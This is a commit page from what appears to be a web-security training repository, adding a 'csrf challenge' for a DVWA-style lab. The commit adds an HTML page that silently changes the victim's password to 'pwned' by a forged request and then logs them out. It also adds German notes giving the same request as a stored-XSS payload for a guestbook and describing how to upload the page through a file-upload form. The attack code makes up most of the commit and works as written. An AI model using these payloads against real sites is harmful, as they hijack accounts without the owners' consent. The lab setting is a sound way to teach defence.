Commit 2f145781 authored by David's avatar David
Browse files

added csrf challenge

parent 64cd330d
<html>
<body>
<h1>Your account has been hacked!</h1>
<p>Well, maybe we will give it back to you :-)</p>
<script>
var xhttp = new XMLHttpRequest();
xhttp.open("GET", "http://[IP]/vulnerabilities/csrf/?password_new=pwned&password_conf=pwned&Change=Change", true);
xhttp.send();
var xhttp_logout = new XMLHttpRequest();
xhttp_logout.open("GET", "http://[IP]/logout.php");
xhttp_logout.send();
</script>
</body>
\ No newline at end of file
# Normal
# Hack 1
Dies kann ins Gästebuch (Stored XSS) eingefügt werden:
```
<script>
var xhttp = new XMLHttpRequest();
xhttp.open("GET", "http://[IP]/vulnerabilities/csrf/?password_new=pwned&password_conf=pwned&Change=Change", true);
xhttp.send();
</script>
```
# Hack 2
Die Datei CSRF.html kann nach der notwendigen Anpassung im File-Upload hochgeladen werden.
\ No newline at end of file
Markdown is supported
0% or .
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment